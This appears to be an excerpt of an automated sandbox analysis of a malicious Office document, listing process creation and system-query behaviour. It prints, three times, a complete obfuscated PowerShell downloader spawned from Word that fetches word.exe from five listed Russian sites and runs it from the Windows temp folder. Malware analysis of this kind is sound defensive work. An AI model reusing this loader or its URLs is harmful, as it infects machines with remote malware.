Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Windows\Temp\229.exeCode function: EnumSystemLocalesW,5_2_00425845
Source: C:\Windows\Temp\229.exeCode function: GetLocaleInfoW,5_2_0042F856
Source: C:\Windows\Temp\229.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_0042F97E
Source: C:\Windows\Temp\229.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_0042F1EA
Source: C:\Windows\Temp\229.exeCode function: GetLocaleInfoW,5_2_0042FA86
Source: C:\Windows\Temp\229.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_0042FB59
Source: C:\Windows\Temp\229.exeCode function: EnumSystemLocalesW,5_2_0042F4DB
Source: C:\Windows\Temp\229.exeCode function: EnumSystemLocalesW,5_2_0042F490
Source: C:\Windows\Temp\229.exeCode function: EnumSystemLocalesW,5_2_0042F576
Source: C:\Windows\Temp\229.exeCode function: GetLocaleInfoW,5_2_00425DD7
Source: C:\Windows\Temp\229.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_0042F601
Source: C:\Windows\Temp\229.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_1_0042F1EA
Source: C:\Windows\Temp\229.exeCode function: EnumSystemLocalesW,5_1_0042F4DB
Source: C:\Windows\Temp\229.exeCode function: EnumSystemLocalesW,5_1_0042F490
Source: C:\Windows\Temp\229.exeCode function: EnumSystemLocalesW,5_1_0042F576
Source: C:\Windows\Temp\229.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_1_0042F601
Source: C:\Windows\Temp\229.exeCode function: EnumSystemLocalesW,5_1_00425845
Source: C:\Windows\Temp\229.exeCode function: GetLocaleInfoW,5_1_0042F856
Source: C:\Windows\Temp\229.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_1_0042F97E
Source: C:\Windows\Temp\229.exeCode function: GetLocaleInfoW,5_1_0042FA86
Source: C:\Windows\Temp\229.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_1_0042FB59
Source: C:\Windows\Temp\229.exeCode function: GetLocaleInfoW,5_1_00425DD7
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Windows\Temp\229.exeCode function: 5_1_00415CB5 cpuid 5_1_00415CB5
Queries information about the installed CPU (vendor, model number etc)Show sources
Source: C:\Windows\Temp\229.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\Temp\229.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\Temp\229.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\Temp\229.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Temp\229.exeQueries volume information: C:\ VolumeInformation